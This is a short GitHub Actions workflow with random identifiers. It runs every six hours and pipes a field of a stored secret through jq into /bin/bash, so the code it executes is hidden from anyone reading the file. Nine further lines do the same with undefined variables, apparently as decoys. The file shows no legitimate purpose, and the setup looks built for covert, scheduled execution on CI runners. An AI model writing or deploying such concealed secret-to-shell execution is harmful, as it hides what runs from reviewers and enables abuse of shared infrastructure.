name: heziwei6781

on:
  workflow_dispatch:
  schedule:
    - cron: '42 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: heziwei6781
        env:
          v00: ${{ secrets.v00 }}
        run: |
          echo $v00 | jq -r .tgfdd3407 | /bin/bash
          echo $ky194 | jq -r .px80678 | /bin/bash
          echo $cm7795 | jq -r .sr5729 | /bin/bash
          echo $mtbp40586 | jq -r .x22475 | /bin/bash
          echo $p4 | jq -r .o623 | /bin/bash
          echo $tqdu14 | jq -r .ncb29144 | /bin/bash
          echo $j40491 | jq -r .lsa23 | /bin/bash
          echo $aqg2320 | jq -r .x19465 | /bin/bash
          echo $ku7 | jq -r .dba45200 | /bin/bash
          echo $qvblm585 | jq -r .uz074 | /bin/bash

